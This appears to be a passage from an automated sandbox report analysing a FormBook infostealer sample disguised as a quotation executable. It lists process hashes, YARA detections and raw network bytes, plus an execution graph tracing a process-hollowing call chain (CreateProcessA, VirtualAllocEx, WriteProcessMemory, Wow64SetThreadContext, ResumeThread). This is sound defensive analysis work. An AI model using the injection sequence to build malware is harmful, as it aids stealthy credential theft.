                                        Aug 27, 2024 08:45:08.920054913 CEST1236INData Raw: 6c 9f ac 4d 06 b1 43 12 7d 0c c0 0d 43 bc 97 c6 83 f8 fe 49 78 14 c8 28 19 3b ce 66 13 07 bc e5 f2 ef dd e5 7d c8 0c a2 a8 93 c3 15 f5 b4 a4 52 3a 84 44 29 fe b3 dc 0b f6 20 2a 3a 89 8e 00 fb 92 1d e8 ef d1 d8 07 f6 20 0a 3a 89 8f 04 9b 2a 11 97
                                        Data Ascii: lMC}CIx(;f}R:D) *: :*Ue>DQIr,"lUWz*pLllP{b[tYs4z__xS#!6cr2:e=N`7-DO=H8[2GAp


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:02:41:01
                                        Start date:27/08/2024
                                        Path:C:\Users\user\Desktop\Quotation-27-08-24.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\Quotation-27-08-24.exe"
                                        Imagebase:0x990000
                                        File size:833'536 bytes
                                        MD5 hash:FCB6844BCA1D8D2A4C41025B08A50799
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:02:41:02
                                        Start date:27/08/2024
                                        Path:C:\Users\user\Desktop\Quotation-27-08-24.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\Desktop\Quotation-27-08-24.exe"
                                        Imagebase:0x150000
                                        File size:833'536 bytes
                                        MD5 hash:FCB6844BCA1D8D2A4C41025B08A50799
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:4
                                        Start time:02:41:02
                                        Start date:27/08/2024
                                        Path:C:\Users\user\Desktop\Quotation-27-08-24.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\Quotation-27-08-24.exe"
                                        Imagebase:0x450000
                                        File size:833'536 bytes
                                        MD5 hash:FCB6844BCA1D8D2A4C41025B08A50799
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2478449837.0000000003490000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2478449837.0000000003490000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2471796851.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2471796851.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:8
                                        Start time:02:41:30
                                        Start date:27/08/2024
                                        Path:C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe"
                                        Imagebase:0xf90000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:9
                                        Start time:02:41:31
                                        Start date:27/08/2024
                                        Path:C:\Windows\SysWOW64\PING.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\PING.EXE"
                                        Imagebase:0x7c0000
                                        File size:18'944 bytes
                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4571817577.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4571817577.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4571765564.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4571765564.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:12
                                        Start time:02:41:56
                                        Start date:27/08/2024
                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                        Imagebase:0x7ff728280000
                                        File size:676'768 bytes
                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:10.3%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:2.1%
                                          Total number of Nodes:290
                                          Total number of Limit Nodes:18
                                          execution_graph 46423 1404550 46425 140455b 46423->46425 46428 1404690 46423->46428 46424 14045b5 46425->46424 46433 1404118 46425->46433 46429 14046b5 46428->46429 46439 1404b99 46429->46439 46443 1404ba8 46429->46443 46434 1404123 46433->46434 46451 1407030 46434->46451 46436 140745d 46458 1407040 46436->46458 46438 1407473 46438->46425 46441 1404bcf 46439->46441 46440 1404cac 46440->46440 46441->46440 46447 1404824 46441->46447 46445 1404bcf 46443->46445 46444 1404cac 46444->46444 46445->46444 46446 1404824 CreateActCtxA 46445->46446 46446->46444 46448 1405c38 CreateActCtxA 46447->46448 46450 1405cfb 46448->46450 46452 140703b 46451->46452 46453 1407040 2 API calls 46452->46453 46456 1409058 46452->46456 46453->46456 46455 140973d 46455->46436 46457 140962c 46456->46457 46462 1408dc0 46456->46462 46457->46436 46459 140704b 46458->46459 46460 1408dc0 2 API calls 46459->46460 46461 140973d 46460->46461 46461->46438 46463 1408dcb 46462->46463 46464 1408df0 2 API calls 46463->46464 46465 140981a 46464->46465 46465->46455 46473 140ec60 46474 140eca6 46473->46474 46477 140ee40 46474->46477 46480 140e770 46477->46480 46481 140eea8 DuplicateHandle 46480->46481 46482 140ed93 46481->46482 46483 140cc60 46484 140cc74 46483->46484 46486 140cc99 46484->46486 46487 140bcd8 46484->46487 46488 140ce40 LoadLibraryExW 46487->46488 46490 140ceb9 46488->46490 46490->46486 46509 fdd01c 46510 fdd034 46509->46510 46511 fdd08e 46510->46511 46516 5383678 46510->46516 46520 53830dc 46510->46520 46528 53843e8 46510->46528 46536 5383688 46510->46536 46517 5383688 46516->46517 46518 53830dc CallWindowProcW 46517->46518 46519 53836cf 46518->46519 46519->46511 46521 53830e7 46520->46521 46522 5384459 46521->46522 46524 5384449 46521->46524 46548 5383204 46522->46548 46540 5384570 46524->46540 46544 5384580 46524->46544 46525 5384457 46530 53843f8 46528->46530 46529 5384459 46531 5383204 CallWindowProcW 46529->46531 46530->46529 46532 5384449 46530->46532 46533 5384457 46531->46533 46534 5384570 CallWindowProcW 46532->46534 46535 5384580 CallWindowProcW 46532->46535 46534->46533 46535->46533 46537 53836ae 46536->46537 46538 53830dc CallWindowProcW 46537->46538 46539 53836cf 46538->46539 46539->46511 46542 5384580 46540->46542 46541 5384620 46541->46525 46552 5384638 46542->46552 46546 5384594 46544->46546 46545 5384620 46545->46525 46547 5384638 CallWindowProcW 46546->46547 46547->46545 46549 538320f 46548->46549 46550 5385b3a CallWindowProcW 46549->46550 46551 5385ae9 46549->46551 46550->46551 46551->46525 46553 5384649 46552->46553 46555 5385a7b 46552->46555 46553->46541 46556 5383204 CallWindowProcW 46555->46556 46557 5385a8a 46556->46557 46557->46553 46186 73fa23c 46191 73fab3e 46186->46191 46206 73faac8 46186->46206 46220 73faad8 46186->46220 46187 73fa232 46192 73faacc 46191->46192 46193 73fab41 46191->46193 46195 73faafa 46192->46195 46234 73fb31f 46192->46234 46239 73fb142 46192->46239 46243 73fb3a2 46192->46243 46248 73fb523 46192->46248 46252 73fb963 46192->46252 46256 73fb08c 46192->46256 46261 73faeef 46192->46261 46266 73fb78f 46192->46266 46271 73fafd0 46192->46271 46276 73fb751 46192->46276 46281 73fb274 46192->46281 46193->46187 46195->46187 46207 73faaf2 46206->46207 46208 73faafa 46207->46208 46209 73fb31f 2 API calls 46207->46209 46210 73fb274 2 API calls 46207->46210 46211 73fb751 2 API calls 46207->46211 46212 73fafd0 2 API calls 46207->46212 46213 73fb78f 2 API calls 46207->46213 46214 73faeef 2 API calls 46207->46214 46215 73fb08c 2 API calls 46207->46215 46216 73fb963 2 API calls 46207->46216 46217 73fb523 2 API calls 46207->46217 46218 73fb3a2 2 API calls 46207->46218 46219 73fb142 2 API calls 46207->46219 46208->46187 46209->46208 46210->46208 46211->46208 46212->46208 46213->46208 46214->46208 46215->46208 46216->46208 46217->46208 46218->46208 46219->46208 46221 73faaf2 46220->46221 46222 73faafa 46221->46222 46223 73fb31f 2 API calls 46221->46223 46224 73fb274 2 API calls 46221->46224 46225 73fb751 2 API calls 46221->46225 46226 73fafd0 2 API calls 46221->46226 46227 73fb78f 2 API calls 46221->46227 46228 73faeef 2 API calls 46221->46228 46229 73fb08c 2 API calls 46221->46229 46230 73fb963 2 API calls 46221->46230 46231 73fb523 2 API calls 46221->46231 46232 73fb3a2 2 API calls 46221->46232 46233 73fb142 2 API calls 46221->46233 46222->46187 46223->46222 46224->46222 46225->46222 46226->46222 46227->46222 46228->46222 46229->46222 46230->46222 46231->46222 46232->46222 46233->46222 46235 73fb447 46234->46235 46285 73f998b 46235->46285 46289 73f9990 46235->46289 46236 73fb465 46293 73f9b3e 46239->46293 46297 73f9b40 46239->46297 46240 73fb176 46240->46195 46244 73fb0c8 46243->46244 46245 73fb0dd 46243->46245 46301 73f8f98 46244->46301 46305 73f8f93 46244->46305 46309 73f9a4b 46248->46309 46313 73f9a50 46248->46313 46249 73fb547 46254 73f9a4b WriteProcessMemory 46252->46254 46255 73f9a50 WriteProcessMemory 46252->46255 46253 73fb994 46254->46253 46255->46253 46257 73fb092 46256->46257 46259 73f8f98 ResumeThread 46257->46259 46260 73f8f93 ResumeThread 46257->46260 46258 73fb0dd 46259->46258 46260->46258 46262 73faef5 46261->46262 46317 73f9ccc 46262->46317 46321 73f9cd8 46262->46321 46325 73f947b 46266->46325 46329 73f9480 46266->46329 46267 73fb6bb 46267->46266 46268 73fb7d2 46267->46268 46272 73faf63 46271->46272 46273 73faef6 46271->46273 46274 73f9ccc CreateProcessA 46272->46274 46275 73f9cd8 CreateProcessA 46272->46275 46273->46195 46274->46273 46275->46273 46277 73fb757 46276->46277 46279 73f9a4b WriteProcessMemory 46277->46279 46280 73f9a50 WriteProcessMemory 46277->46280 46278 73fb81d 46279->46278 46280->46278 46333 73fc1d8 46281->46333 46338 73fc1c7 46281->46338 46282 73fb28c 46282->46195 46286 73f9990 VirtualAllocEx 46285->46286 46288 73f9a0d 46286->46288 46288->46236 46290 73f99d0 VirtualAllocEx 46289->46290 46292 73f9a0d 46290->46292 46292->46236 46294 73f9b40 ReadProcessMemory 46293->46294 46296 73f9bcf 46294->46296 46296->46240 46298 73f9b8b ReadProcessMemory 46297->46298 46300 73f9bcf 46298->46300 46300->46240 46302 73f8fd8 ResumeThread 46301->46302 46304 73f9009 46302->46304 46304->46245 46306 73f8f98 ResumeThread 46305->46306 46308 73f9009 46306->46308 46308->46245 46310 73f9a50 WriteProcessMemory 46309->46310 46312 73f9aef 46310->46312 46312->46249 46314 73f9a98 WriteProcessMemory 46313->46314 46316 73f9aef 46314->46316 46316->46249 46318 73f9cd8 CreateProcessA 46317->46318 46320 73f9f23 46318->46320 46322 73f9d61 CreateProcessA 46321->46322 46324 73f9f23 46322->46324 46326 73f9480 Wow64SetThreadContext 46325->46326 46328 73f950d 46326->46328 46328->46267 46330 73f94c5 Wow64SetThreadContext 46329->46330 46332 73f950d 46330->46332 46332->46267 46334 73fc1ed 46333->46334 46336 73f947b Wow64SetThreadContext 46334->46336 46337 73f9480 Wow64SetThreadContext 46334->46337 46335 73fc203 46335->46282 46336->46335 46337->46335 46339 73fc1d8 46338->46339 46341 73f947b Wow64SetThreadContext 46339->46341 46342 73f9480 Wow64SetThreadContext 46339->46342 46340 73fc203 46340->46282 46341->46340 46342->46340 46343 53892b0 46346 5387fa0 46343->46346 46345 53892be 46347 5387fab 46346->46347 46351 1408df0 46347->46351 46355 1409859 46347->46355 46348 53898b4 46348->46345 46352 1408dfb 46351->46352 46359 1408e20 46352->46359 46354 140990d 46354->46348 46356 140989b 46355->46356 46357 1408e20 2 API calls 46356->46357 46358 140990d 46357->46358 46358->46348 46361 1408e2b 46359->46361 46360 140a229 46360->46354 46361->46360 46363 140e998 46361->46363 46364 140e9b9 46363->46364 46365 140e9dd 46364->46365 46367 140eb48 46364->46367 46365->46360 46368 140eb55 46367->46368 46369 140eb8f 46368->46369 46371 140e6a8 46368->46371 46369->46365 46373 140e6b3 46371->46373 46372 140f4a0 46373->46372 46375 140e7d4 46373->46375 46376 140e7df 46375->46376 46377 1408e20 2 API calls 46376->46377 46378 140f50f 46377->46378 46382 5381340 46378->46382 46389 5381328 46378->46389 46379 140f549 46379->46372 46384 5381471 46382->46384 46385 5381371 46382->46385 46383 538137d 46383->46379 46384->46379 46385->46383 46396 5382198 46385->46396 46401 5382187 46385->46401 46406 5382120 46385->46406 46391 5381371 46389->46391 46392 5381471 46389->46392 46390 538137d 46390->46379 46391->46390 46393 5382198 2 API calls 46391->46393 46394 5382120 2 API calls 46391->46394 46395 5382187 2 API calls 46391->46395 46392->46379 46393->46392 46394->46392 46395->46392 46397 53821c3 46396->46397 46398 5382272 46397->46398 46412 5383011 46397->46412 46418 5383080 46397->46418 46402 5382196 46401->46402 46403 5382272 46402->46403 46404 5383080 2 API calls 46402->46404 46405 5383011 2 API calls 46402->46405 46404->46403 46405->46403 46407 538212e 46406->46407 46408 5382196 46406->46408 46407->46384 46409 5382272 46408->46409 46410 5383080 2 API calls 46408->46410 46411 5383011 2 API calls 46408->46411 46410->46409 46411->46409 46413 538303a 46412->46413 46414 538303e 46413->46414 46416 53834c9 CreateWindowExW 46413->46416 46417 53834d0 CreateWindowExW 46413->46417 46414->46398 46415 53830b5 46415->46398 46416->46415 46417->46415 46419 53830a8 46418->46419 46421 53834c9 CreateWindowExW 46419->46421 46422 53834d0 CreateWindowExW 46419->46422 46420 53830b5 46420->46398 46421->46420 46422->46420 46558 140cbb8 46559 140cc00 GetModuleHandleW 46558->46559 46560 140cbfa 46558->46560 46561 140cc2d 46559->46561 46560->46559 46466 73fc220 46467 73fc3ab 46466->46467 46469 73fc246 46466->46469 46469->46467 46470 73fbd30 46469->46470 46471 73fc4a0 PostMessageW 46470->46471 46472 73fc50c 46471->46472 46472->46469 46491 73fde90 46492 73fdeae 46491->46492 46493 73fdeb8 46491->46493 46496 73fdef8 46492->46496 46501 73fdef3 46492->46501 46493->46493 46497 73fdf06 46496->46497 46498 73fdf25 46496->46498 46506 73fd2dc 46497->46506 46498->46493 46502 73fdf06 46501->46502 46503 73fdf25 46501->46503 46504 73fd2dc FindCloseChangeNotification 46502->46504 46503->46493 46505 73fdf21 46504->46505 46505->46493 46507 73fe070 FindCloseChangeNotification 46506->46507 46508 73fdf21 46507->46508 46508->46493

                                          Executed Functions

                                          Function 053BE660 Relevance: .7, Instructions: 651COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dc128a674d963ceb069836aece66043671aa1896e25338f5b1e9196f0cfd0544
                                          • Instruction ID: 665fb9e23e34b48e323636044899d4689d4eac9e8c8c5783bdc55d80adeea58f
                                          • Opcode Fuzzy Hash: dc128a674d963ceb069836aece66043671aa1896e25338f5b1e9196f0cfd0544
                                          • Instruction Fuzzy Hash: 0142F678B10600CFDB29AB78C4586AA7BFAFF89305F10446DE607DB764DEB69841DB00
                                          Function 01407030 Relevance: .5, Instructions: 519COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2118550402.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1400000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 534df76e385a5c87a2d42200b66363de56bcc1fd2848ece039ced4cce3fb964f
                                          • Instruction ID: 183a894cdb1a81566381a1a281c35247c7a0b8cdad0aa42d4d046cffd8931abb
                                          • Opcode Fuzzy Hash: 534df76e385a5c87a2d42200b66363de56bcc1fd2848ece039ced4cce3fb964f
                                          • Instruction Fuzzy Hash: 6422F330600501CFCB4ADF69D584A69B7A2FF95308B65CAADD4098B2A6D737EC53CF84
                                          Function 01409028 Relevance: .4, Instructions: 369COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2118550402.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1400000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 94934b6d193c6f272f74cad34060770293067d4a2c87caec79ae3f709f0d2020
                                          • Instruction ID: 07f53ff3b52e7a7dfe4eb9e64076609e30b395e46b6e5d059eb4c84fc218adec
                                          • Opcode Fuzzy Hash: 94934b6d193c6f272f74cad34060770293067d4a2c87caec79ae3f709f0d2020
                                          • Instruction Fuzzy Hash: B3F1DF34600501CFCB4ADF3AD584A69B762FF95308B65CAADC0098B2A6D737E853CF85
                                          Function 073F0390 Relevance: .1, Instructions: 125COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b33182e946dd44d58d648782bee999ade7460a34adcd83e145ab43b426f134e2
                                          • Instruction ID: 6aa3d96b8d8906f98d54c4ac0e0544a78a4c65110fdc8a2c2f513bff4f56d4c5
                                          • Opcode Fuzzy Hash: b33182e946dd44d58d648782bee999ade7460a34adcd83e145ab43b426f134e2
                                          • Instruction Fuzzy Hash: 92416CF1F156158BEB0C8AB959511BFFBBBABC9340F10D427D60AFB691CA318D018B91
                                          Function 073F03A0 Relevance: .1, Instructions: 119COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d853f4a6b19d40c128b9bd1fb3a8b879ec0b784cdf182e78e8d8315417f7a342
                                          • Instruction ID: dd3e690a4b2deec6cb101b5b27b53458df9ad3e9fc9e997c305d41588bed87ef
                                          • Opcode Fuzzy Hash: d853f4a6b19d40c128b9bd1fb3a8b879ec0b784cdf182e78e8d8315417f7a342
                                          • Instruction Fuzzy Hash: 68414AB1F156148BE70C8AB999511BFF6BAEBC9340F10D427D61AFB681CA31CD018B91
                                          Function 073F3FF8 Relevance: .1, Instructions: 62COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d45f7192b20ab8ab5274acc7415009fcb5c406679c16621668da901cfb1004a5
                                          • Instruction ID: 30fcec741d857eee95dc536dd8f28ca80199e3f67e388d188580de25243c3b8f
                                          • Opcode Fuzzy Hash: d45f7192b20ab8ab5274acc7415009fcb5c406679c16621668da901cfb1004a5
                                          • Instruction Fuzzy Hash: 212107B1D056999BEB19CFA7C8043DEFFB6AFC9300F08C06AC409A6265DBB409468F50
                                          Function 073F4008 Relevance: .1, Instructions: 56COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 490796893e388ec2e7a1e2666774986153944540e56e857e9a1d4110357f88eb
                                          • Instruction ID: 677c5cfdf21461ee83683edecc74d79a39520602cfe107fc103af97b8aba1381
                                          • Opcode Fuzzy Hash: 490796893e388ec2e7a1e2666774986153944540e56e857e9a1d4110357f88eb
                                          • Instruction Fuzzy Hash: 7121E4B1D006589BEB18CFABD8097DEFAF7AFC8340F04C06AD50966264DBB409468F90
                                          Function 073FD2E8 Relevance: 2.0, APIs: 1, Instructions: 505COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 69 73fd2e8-73fd2f0 71 73fd2df-73fd2e3 69->71 72 73fd2f2-73fd442 69->72 74 73fe070-73fe0d5 FindCloseChangeNotification 71->74 75 73fd448-73fd483 call 73fc05c call 73fc06c call 73fc07c 72->75 76 73fd7f1-73fd7f6 72->76 77 73fe0de-73fe106 74->77 78 73fe0d7-73fe0dd 74->78 93 73fd496-73fd4b6 75->93 94 73fd485-73fd48f 75->94 80 73fd7f8-73fd7fa 76->80 81 73fd800-73fd812 call 73fcae8 76->81 78->77 80->81 88 73fd818-73fd81f 81->88 96 73fd4c9-73fd4e9 93->96 97 73fd4b8-73fd4c2 93->97 94->93 99 73fd4fc-73fd51c 96->99 100 73fd4eb-73fd4f5 96->100 97->96 102 73fd52f-73fd538 call 73fd15c 99->102 103 73fd51e-73fd528 99->103 100->99 106 73fd55c-73fd565 call 73fd16c 102->106 107 73fd53a-73fd555 call 73fd15c 102->107 103->102 112 73fd589-73fd592 call 73fd17c 106->112 113 73fd567-73fd582 call 73fd16c 106->113 107->106 119 73fd59d-73fd5b9 112->119 120 73fd594-73fd598 call 73fd18c 112->120 113->112 124 73fd5bb-73fd5c1 119->124 125 73fd5d1-73fd5d5 119->125 120->119 128 73fd5c5-73fd5c7 124->128 129 73fd5c3 124->129 126 73fd5ef-73fd637 125->126 127 73fd5d7-73fd5e8 call 73fd19c 125->127 135 73fd65b-73fd662 126->135 136 73fd639 126->136 127->126 128->125 129->125 137 73fd679-73fd687 call 73fd1ac 135->137 138 73fd664-73fd673 135->138 139 73fd63c-73fd642 136->139 148 73fd689-73fd68b 137->148 149 73fd691-73fd6ba call 73fcae8 call 73fd1bc 137->149 138->137 140 73fd648-73fd64e 139->140 141 73fd820-73fd847 call 73fdafd 139->141 143 73fd658-73fd659 140->143 144 73fd650-73fd652 140->144 159 73fd89e-73fd8ac call 73fd420 141->159 160 73fd849 141->160 143->135 143->139 144->143 148->149 157 73fd6bc-73fd6ca 149->157 158 73fd6e7-73fd703 149->158 157->158 167 73fd6cc-73fd6e0 157->167 168 73fd716-73fd73d call 73fd1cc 158->168 169 73fd705-73fd70f 158->169 162 73fd84e-73fd85d 160->162 162->159 166 73fd85f 162->166 166->159 166->160 170 73fd866-73fd86d 166->170 171 73fd885-73fd89c 166->171 167->158 180 73fd73f-73fd745 168->180 181 73fd755-73fd759 168->181 169->168 173 73fd86f-73fd874 170->173 174 73fd876 170->174 171->162 175 73fd87b-73fd883 173->175 174->175 175->162 182 73fd749-73fd74b 180->182 183 73fd747 180->183 184 73fd75b-73fd76d 181->184 185 73fd774-73fd790 181->185 182->181 183->181 184->185 188 73fd7a8-73fd7ac 185->188 189 73fd792-73fd798 185->189 188->88 190 73fd7ae-73fd7bc 188->190 191 73fd79c-73fd79e 189->191 192 73fd79a 189->192 194 73fd7ce-73fd7d2 190->194 195 73fd7be-73fd7cc 190->195 191->188 192->188 197 73fd7d8-73fd7f0 194->197 195->194 195->197
                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,073FDF21,?,?), ref: 073FE0C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: eb8ffb4070dac514b3fef37bb4939df17d3166096980bee21f9738c7708c29f5
                                          • Instruction ID: 938bf27364e26f3d5e57a0748ed4d9e5d9b3041481f983836e7fa094ae9e4184
                                          • Opcode Fuzzy Hash: eb8ffb4070dac514b3fef37bb4939df17d3166096980bee21f9738c7708c29f5
                                          • Instruction Fuzzy Hash: D6D1AEB1710705CFEB15DB76C4A4BAEB7F6AF8A340F1044AED2499B2A0CB35E905CB51
                                          Function 073F9CCC Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 199 73f9ccc-73f9d6d 202 73f9d6f-73f9d79 199->202 203 73f9da6-73f9dc6 199->203 202->203 204 73f9d7b-73f9d7d 202->204 208 73f9dff-73f9e2e 203->208 209 73f9dc8-73f9dd2 203->209 206 73f9d7f-73f9d89 204->206 207 73f9da0-73f9da3 204->207 210 73f9d8d-73f9d9c 206->210 211 73f9d8b 206->211 207->203 217 73f9e67-73f9f21 CreateProcessA 208->217 218 73f9e30-73f9e3a 208->218 209->208 213 73f9dd4-73f9dd6 209->213 210->210 212 73f9d9e 210->212 211->210 212->207 214 73f9df9-73f9dfc 213->214 215 73f9dd8-73f9de2 213->215 214->208 219 73f9de6-73f9df5 215->219 220 73f9de4 215->220 231 73f9f2a-73f9fb0 217->231 232 73f9f23-73f9f29 217->232 218->217 221 73f9e3c-73f9e3e 218->221 219->219 222 73f9df7 219->222 220->219 223 73f9e61-73f9e64 221->223 224 73f9e40-73f9e4a 221->224 222->214 223->217 226 73f9e4e-73f9e5d 224->226 227 73f9e4c 224->227 226->226 228 73f9e5f 226->228 227->226 228->223 242 73f9fb2-73f9fb6 231->242 243 73f9fc0-73f9fc4 231->243 232->231 242->243 244 73f9fb8 242->244 245 73f9fc6-73f9fca 243->245 246 73f9fd4-73f9fd8 243->246 244->243 245->246 249 73f9fcc 245->249 247 73f9fda-73f9fde 246->247 248 73f9fe8-73f9fec 246->248 247->248 250 73f9fe0 247->250 251 73f9ffe-73fa005 248->251 252 73f9fee-73f9ff4 248->252 249->246 250->248 253 73fa01c 251->253 254 73fa007-73fa016 251->254 252->251 256 73fa01d 253->256 254->253 256->256
                                          APIs
